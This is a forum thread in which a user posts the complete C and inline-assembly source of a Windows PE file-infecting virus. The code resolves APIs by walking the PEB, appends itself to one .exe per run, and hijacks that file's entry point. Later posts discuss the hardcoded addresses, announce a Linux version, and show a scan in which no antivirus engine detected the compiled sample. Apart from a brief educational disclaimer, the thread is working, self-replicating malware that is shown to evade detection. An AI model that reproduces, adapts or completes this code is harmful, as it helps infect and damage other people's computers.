JMC31337 Posted April 21, 2019 Share Posted April 21, 2019 //./gcc -masm=intel -mwindows -m32 -o file.exe xfile.c //Run the virus under a debugger (the jmp orig EP only works //after first infection is completed - afterwards all files //will infect and run as normal //it will infect 1 exe file per run in current dir //x86 PE Parasite //WARNING! //For educational purposes and virology analysis ONLY! //The author is not responsible for any damage caused //by this code //NOTE: I took some cheap tactics and tricks to get this //to work and its some real convoluted coding //============virt mem array========= //virtallocAPI* [ebp+0x00] (win7) //findfirstfileAPI [ebp+0x04] //findnextfileAPI [ebp+0x08] //CreateFileAPI [ebp+0x0c] //ReadFileAPI [ebp+0x10] //CloseHandleAPI [ebp+0x14] //WriteFileAPI [ebp+0x18] //fileEP [ebp+0x1c] PE+0x28 //fileSecNos [ebp+0x20] PE+0x06 //fileImgSize+4000h [ebp+0x24] PE+0x50 //fileImgBase [ebp+0x28] PE+34 //fileSecVS+4000h [ebp+0x2c] PE+F8+((0x28*[secnos])-20h) //fileSecRS+4000h [ebp+0x30] PE+F8+((0x28*[secnos])-18h) //shellEP [ebp+0x34] //hostloadPTR [ebp+0x38] //GetProcAPI [ebp+0x3c] //LoadLib [ebp+0x40] //k32 base [ebp+0x44] //fhandle [ebp+0x48] //WIN32_FILE_DATA [ebp+0x4C] //WIN32 fname [ebp+WIN32_FILE_DATA+0x2c] //GetFileSizeAPI [ebp+0x100] //FileSize [ebp+0x104] //virtHostAddr [ebp+0x108] //========================================= #include <windows.h> void step() { asm ( ".intel_syntax noprefix\n" //HEURISTICS AV DETECT THIS //BASE WALKING //crypto mem it "_start:\n" "call _start2\n" "_start2:\n" "pop ebx\n" "sub ebx,0x05\n" "pushad\n" "mov [0x7EFDF400],ebx\n" //CHEAP //================================== "mov eax,dword ptr fs:[0x30]\n" "mov eax,dword ptr ds:[eax+0xC]\n" "mov eax,dword ptr ds:[eax+0x14]\n" "mov eax,dword ptr ds:[eax]\n" "mov eax,dword ptr ds:[eax]\n" "mov eax,dword ptr ds:[eax+0x10]\n" //=================================== "mov ebx,eax\n" //eax ebx = k32 base "mov eax,[eax+0x3c]\n" "add eax,ebx\n" //eax=PE "cmp word ptr[eax+0x04],0x014C\n" //0x8664 for x64...0x14c for x86 "jne _end\n" "sub eax,ebx\n" "mov eax,[eax+0x78+ebx]\n" "add eax,ebx\n" "mov edx,eax\n" //edx=imgVA "mov ecx,[edx+0x18]\n" "mov eax,[edx+0x20]\n" "add eax,ebx\n" "_find:\n" "dec ecx\n" "mov edi,[eax+ecx*0x04]\n" "add edi,ebx\n" "cmp dword ptr [edi],0x50746547\n" "jnz _find\n" "cmp dword ptr [edi + 0x04],0x41636f72\n" //Acor "jnz _find\n" "cmp dword ptr [edi + 0x08],0x65726464\n" //erdd "jnz _find\n" "cmp word ptr [edi + 0x0C],0x7373\n" //ss "jnz _find\n" "mov eax,[edx+0x24]\n" "add eax,ebx\n" "mov cx,[eax+ecx*0x02]\n" "mov eax,[edx+0x1c]\n" "add eax,ebx\n" "mov eax,[eax+ecx*0x04]\n" "add eax,ebx\n" "mov edi,eax\n" //edi eax = GetProcAPI "push 0x00\n" //00000000 .... "push 0x41797261\n" //41797261 aryA "push 0x7262694C\n" //7262694C Libr "push 0x64616F4C\n" //64616F4C Load "push esp\n" //esp = loadlibraryA on stack "push ebx\n" //push the k32 base address "call edi\n" "add esp,0x10\n" //clean stack garbage up "mov edx,eax\n" //edx=LoadLibraryA API edi=GetProcAddr "push edx\n" //set virt mem location RWE "push 0x00\n" "push 0x636f6c6c\n" "push 0x416c6175\n" "push 0x74726956\n" "push esp\n" "push ebx\n" "call edi\n" //eax=VirtualAllocAPI "add esp,0x10\n" //clean stack garbage up "push 0x40\n" "push 0x1000\n" "push 0x1000\n" "push 0\n" "call eax\n" //eax=Virtrual RWE mem array "mov ebp,eax\n" //set the ebp pointer to virt mem "mov ecx,edi\n" "add ecx,0x600\n" //win7 virt alloc is -600 getproc "mov [ebp],ecx\n" "mov [ebp+0x3c],edi\n" "mov [ebp+0x44],ebx\n" "pop edx\n" "mov [ebp+0x40],edx\n" //edi=getproc //FindFirstFileA //46 69 6E 64 46 69 72 73 74 46 69 6C 65 41 00 "push 0x004165\n" "push 0x6c694674\n" "push 0x73726946\n" "push 0x646e6946\n" "push esp\n" "push ebx\n" "call edi\n" "mov [ebp+0x04],eax\n" "add esp,0x10\n" //FindNextFileA //46 69 6E 64 4E 65 78 74 46 69 6C 65 41 00 "push 0x0041\n" "push 0x656c6946\n" "push 0x7478654e\n" "push 0x646e6946\n" "push esp\n" "push ebx\n" "call edi\n" "mov [ebp+0x08],eax\n" "add esp,0x10\n" //CreateFileA //43 72 65 61 74 65 46 69 6C 65 41 00 "push 0x0041656c\n" "push 0x69466574\n" "push 0x61657243\n" "push esp\n" "push ebx\n" "call edi\n" "mov [ebp+0x0c],eax\n" "add esp,0x0c\n" //ReadFile //52 65 61 64 46 69 6C 65 00 "push 0x00\n" "push 0x656c6946\n" "push 0x64616552\n" "push esp\n" "push ebx\n" "call edi\n" "mov [ebp+0x10],eax\n" "add esp,0x0c\n" //CloseHandle //43 6C 6F 73 65 48 61 6E 64 6C 65 00 "push 0x00656c64\n" "push 0x6e614865\n" "push 0x736f6c43\n" "push esp\n" "push ebx\n" "call edi\n" "mov [ebp+0x14],eax\n" "add esp,0x0c\n" //WriteFile //57 72 69 74 65 46 69 6C 65 00 "push 0x0065\n" "push 0x6c694665\n" "push 0x74697257\n" "push esp\n" "push ebx\n" "call edi\n" "mov [ebp+0x18],eax\n" "add esp,0x0c\n" //GetFileSize //47 65 74 46 69 6C 65 53 69 7A 65 "push 0x00657a69\n" "push 0x53656c69\n" "push 0x46746547\n" "push esp\n" "push ebx\n" "call edi\n" "mov edx,ebp\n" "add edx,0x100\n" "mov [edx],eax\n" "add esp,0x0c\n" //setup WIN32_FIND_DATA "mov edx,ebp\n" "add edx,0x2c\n" "add edx,0x4c\n" "mov dword ptr[edx],0x78652e2a\n" "mov dword ptr[edx+0x4],0x0065\n" "mov edx,ebp\n" "add edx,0x4c\n" "push edx\n" "mov edx,ebp\n" "add edx,0x78\n" "push edx\n" "mov edx,[ebp+0x04]\n" "call edx\n" //FindFirstFile "cmp eax,0x00\n" //eax 0 = no file "je _end\n" "mov [ebp+0x48],eax\n" //open file to see if it has RW privs "push 0x00\n" "push 0x80\n" "push 0x03\n" "push 0x00\n" "push 0x00\n" "push 0xC0000000\n" //read+write "mov edx,ebp\n" "add edx,0x78\n" "push edx\n" "mov edx,[ebp+0x0c]\n" "call edx\n" //CreateFile "cmp eax,0x00\n" "je _end\n" "cmp eax,0xFFFFFFFF\n" //ff...=share error "je _findnext\n" "mov [ebp+0x250],eax\n" "_findret:\n" //GetFileSize //eax=file handle "push eax\n" "mov edx,ebp\n" "add edx,0x104\n" "push edx\n" "sub edx,0x04\n" "push eax\n" "mov edx,[edx]\n" "call edx\n" "mov [ebp+0x104],eax\n" "mov edx,eax\n" "add edx,0x4000\n" //inc fsize + 4000h "push 0x40\n" //PAGE_EXECUTE_READWRITE "push 0x1000\n" //MEM_COMMIT "push edx\n" //size "push 0x00\n" //virt addr "mov edx,[ebp]\n" "call edx\n" "mov [ebp+0x108],eax\n" //ReadFile "mov edx,0x00\n" "push edx\n" "mov edx,ebp\n" "add edx,0x10c\n" //ebp+10c hold the bytes read ret "push edx\n" "mov edx,ebp\n" "add edx,0x104\n" "mov edx,[edx]\n" //"add edx,0x4000\n" "push edx\n" "mov edx,ebp\n" "add edx,0x108\n" "mov edx,[edx]\n" "push edx\n" "mov edx,[esp+0x10]\n" "push edx\n" "mov edx,[ebp+0x10]\n" "call edx\n" //ReadFile (ebp+0x108 = virt file) "add esp,0x04\n" //CloseHandle "mov edx,[ebp+0x250]\n" "push edx\n" "mov edx,[ebp+0x14]\n" "call edx\n" //DETECT EOF "X" IF HOST IS INFECTED //CLOSEHANDLE B4 findnext?? "mov edx,[ebp+0x108]\n" "add edx,[ebp+0x104]\n" "dec edx\n" "cmp byte ptr [edx],0x58\n" "je _findnext\n" "mov edx,[ebp+0x108]\n" "add edx,[edx+0x3c]\n" "cmp word ptr [edx+0x04],0x014c\n" //x86 parasite "jne _findnext\n" //***************************************8 //place host's EP into 0x7EFDF404 // and host's PE+ 0xbc //since we'll overwrite orig EP //to point to shell "push edx\n" "mov ecx,edx\n" "add ecx,0xbc\n" //"mov ecx,[edx+0xbc]\n" //host PE not used location "mov eax,[edx+0x34]\n" //eax=hostBaseAddr "add edx,0x28\n" "mov edx,[edx]\n" "add edx,eax\n" "mov [ecx],edx\n" "mov [0x7efdf404],edx\n" "pop edx\n" //****************************************8 "mov ecx,[edx+0x28]\n" //here--------------------------------------------------- "mov ecx,[0x7EFDF404]\n" "mov [edx+0xbc],ecx\n" "mov [ebp+0x200],ecx\n" //------------------------------------------------------- "mov [ebp+0x1c],ecx\n" "xor ecx,ecx\n" "mov cx,word ptr[edx+0x06]\n" "mov [ebp+0x20],ecx\n" "mov ecx,[edx+0x50]\n" "mov [ebp+0x24],ecx\n" "mov ecx,[edx+0x34]\n" "mov [ebp+0x28],ecx\n" "mov ecx,edx\n" "add ecx,0xf8\n" "mov eax,[ebp+0x20]\n" "mov edx,0x28\n" "mul edx\n" "add ecx,eax\n" "sub ecx,0x20\n" "mov edx,[ecx]\n" "mov [ebp+0x2c],edx\n" "add ecx,0x08\n" "mov edx,[ecx]\n" "mov [ebp+0x30],edx\n" //edx=PE sec vs "mov edx,[ebp+0x2c]\n" "add edx,0x4000\n" "mov [ebp+0x2c],edx\n" "mov edx,[ebp+0x30]\n" "add edx,0x4000\n" "mov [ebp+0x30],edx\n" "mov edx,[ebp+0x24]\n" "add edx,0x4000\n" "mov [ebp+0x24],edx\n" "push 0x006c6c\n" "push 0x642e3233\n" "push 0x72657375\n" "mov edx,[ebp+0x40]\n" "push esp\n" "call edx\n" "add esp,0x0c\n" "push 0x0041786f\n" "push 0x42656761\n" "push 0x7373654d\n" "push esp\n" "push eax\n" "mov edx,[ebp+0x3c]\n" "call edx\n" "add esp,0x08\n" "push 0x00\n" "push 0x00\n" "push 0x00\n" "push 0x00\n" "call eax\n" "add esp,0x04\n" //DETECT virus -> host //DETECT infectedHOST -> host "_peNFX:\n" "mov edx,[ebp+0x108]\n" "add edx,[ebp+0x104]\n" "mov ecx,0x550\n" "mov esi,[0x7EFDF400]\n" //"add esi,[ebp+0x108]\n" "mov edi,edx\n" "rep movsb\n" "mov ecx,[ebp+0x108]\n" "add ecx,[ecx+0x3c]\n" "add ecx,0xf8\n" "mov eax,[ebp+0x20]\n" "mov edx,0x28\n" "mul edx\n" "add ecx,eax\n" "sub ecx,0x20\n" "push ecx\n" "mov edx,ebp\n" "add edx,0x28\n" "mov edx,[edx]\n" "add edx,[ebp+0x1c]\n" "mov ecx,[ebp+0x104]\n" "add ecx,0x4000\n" //================================== //notes: //*change hostEP "mov edx,[esp]\n" "mov eax,[edx+0x0c]\n" //eax=RO "sub ecx,eax\n" "mov eax,[edx+0x04]\n" //edx=VO "add ecx,eax\n" "mov [ebp+0x34],ecx\n" "mov edx,ebp\n" "add edx,0x108\n" "mov edx,[edx]\n" //change VS "mov edx,[esp]\n" "mov eax,[ebp+0x2c]\n" "mov [edx],eax\n" //change RS "mov edx,[esp]\n" "add edx,0x08\n" "mov eax,[ebp+0x30]\n" "mov [edx],eax\n" //change imgsize "mov edx,[esp]\n" "mov edx,[ebp+0x108]\n" "add edx,[edx+0x3c]\n" "add edx,0x50\n" "mov eax,[ebp+0x24]\n" "mov [edx],eax\n" //add "X" EOF indication "mov edx,[ebp+0x108]\n" "add edx,[ebp+0x104]\n" "add edx,0x4000\n" "dec edx\n" "mov byte ptr[edx],0x58\n" //reopen file for write //when using valloc //we cant access a file //for read then write one shot //its one then the other "push 0x00\n" "push 0x80\n" "push 0x03\n" "push 0x00\n" "push 0x00\n" "push 0x40000000\n" //read+write "mov edx,ebp\n" "add edx,0x78\n" "push edx\n" "mov edx,[ebp+0x0c]\n" "call edx\n" //CreateFile "cmp eax,0x00\n" "je _end\n" "cmp eax,0xFFFFFFFF\n" //ff...=share error "je _findnext\n" "mov [ebp+0x250],eax\n" //shell_raw_location - ro + vo + imgbase //change hostEP "mov eax,[ebp+0x108]\n" "add eax,[ebp+0x104]\n" "add eax,0x502\n" //CHEAP "mov edx,fs:[0x30]\n" "mov edx,[edx+0x08]\n" "push edx\n" //"mov edx,[0x010075]\n" //CHEAP "add edx,[edx+0x3c]\n" "add edx,0x28\n" "mov edx,[edx]\n" "pop ecx\n" "add edx,ecx\n" //"mov [eax],edx\n" "mov [0x7EFDF400],edx\n" "mov edx,[ebp+0x108]\n" "add edx,[edx+0x3c]\n" "add edx,0x28\n" "mov ecx,[ebp+0x104]\n" //"sub ecx,0x4000\n" "mov edx,[esp]\n" "sub ecx,[edx+0x0c]\n" "add ecx,[edx+0x04]\n" "mov edx,[ebp+0x108]\n" "add edx,[edx+0x3c]\n" "add edx,0x28\n" "mov [edx],ecx\n" /* "mov ecx,[ebp+0x108]\n" "add ecx,[ecx+0x3c]\n" "mov edx,[0x7EFDF404]\n" "add ecx,0xbc\n" "mov [ecx],edx\n" */ //writefile "push 0x00\n" "mov edx,ebp\n" "add edx,0x10c\n" "mov dword ptr[edx],0x000000\n" "push edx\n" "mov edx,[ebp+0x104]\n" "add edx,0x4000\n" "push edx\n" "mov edx,[ebp+0x108]\n" "push edx\n" "mov edx,[ebp+0x250]\n" "push edx\n" "mov edx,[ebp+0x18]\n" "call edx\n" "pop eax\n" "jmp _end\n" "_findnext:\n" "mov edx,ebp\n" "add edx,0x4c\n" "push edx\n" "mov edx,[ebp+0x48]\n" "push edx\n" "mov edx,[ebp+0x08]\n" "call edx\n" "cmp eax,0x00\n" "je _end\n" "push 0x00\n" "push 0x80\n" "push 0x03\n" "push 0x00\n" "push 0x00\n" "push 0xc0000000\n" //read+write "mov edx,ebp\n" "add edx,0x78\n" "push edx\n" "mov edx,[ebp+0x0c]\n" "call edx\n" //CreateFileA "cmp eax,0x00\n" "je _end\n" "cmp eax,0xFFFFFFFF\n" //ff...=share error "je _findnext\n" "mov [ebp+0x250],eax\n" "jmp _findret\n" //detect eax=0 and eax=ffffffff "_end:\n" "popad\n" "mov edx,fs:[0x30]\n" "mov edx,[edx+0x08]\n" "mov ecx,edx\n" "add ecx,[ecx+0x3c]\n" "mov edx,[ecx+0xbc]\n" "jmp edx\n" "push eax\n" "push eax\n" ); }//end step fx int WINAPI WinMain(HINSTANCE h, HINSTANCE h2, LPSTR lp, int i) { asm("pop ebp\n"); asm("call _start\n"); MessageBoxA(0,0,0,0); } Link to comment Share on other sites More sharing options...
CodeExplorer Posted April 21, 2019 Share Posted April 21, 2019 Look a bit like my private virus! Quote "mov [0x7EFDF400],ebx\n" //CHEAP Quote "mov [0x7EFDF400],edx\n" What are those for? Plus I doubt it will work on any OS different than yours! Link to comment Share on other sites More sharing options...
JMC31337 Posted April 21, 2019 Author Share Posted April 21, 2019 2 hours ago, CodeExplorer said: Look a bit like my private virus! What are those for? Plus I doubt it will work on any OS different than yours! That’s just a location in the PEB that can handle some stored dword data tested on a win7, the virtualalloc method (add ecx,600) may not work on others but it can be fixed to do so take care, on to Linux to write one similar Link to comment Share on other sites More sharing options...
JMC31337 Posted May 5, 2019 Author Share Posted May 5, 2019 xfile.exe Name: xfile.exe Size: 18.33kB (18,768 bytes) Type: PE32 executable (console) Intel 80386 (stripped to external PDB), for MS Windows First seen: May 5, 2019 at 11:03:22 PM GMT+2 MD5: 3b722544eb9410e2f7bf42350ff530c0 SHA1: 1e1edf4df43fafe5a3cfa18646a573142545ad6e Status: Scan finished. 0/15 scanners reported malware. Scan taken on: May 5, 2019 at 11:03:23 PM GMT+2 Avast! Antivirus May 5, 2019 Found nothing BitDefender Antivirus May 5, 2019 Found nothing ClamAV May 5, 2019 Found nothing Dr. Web May 5, 2019 Found nothing MicroWorld eScan May 5, 2019 Found nothing ESET May 5, 2019 Found nothing Fortinet May 4, 2019 Found nothing F-PROT Antivirus May 5, 2019 Found nothing F-Secure Anti-Virus May 5, 2019 Found nothing G DATA May 5, 2019 Found nothing Ikarus May 5, 2019 Found nothing K7 AV May 5, 2019 Found nothing Sophos May 5, 2019 Found nothing Trend Micro Antivirus May 4, 2019 Found nothing VBA32 May 4, 2019 Found nothing --Jotti Scanned -- Norton Internet Security Heuristics were raised, AFTER the infection already transpired into 1 file, this 1 file was not able to infefct some other file Link to comment Share on other sites More sharing options...
Recommended Posts
Create an account or sign in to comment
You need to be a member in order to leave a comment
Create an account
Sign up for a new account in our community. It's easy!
Register a new accountSign in
Already have an account? Sign in here.
Sign In Now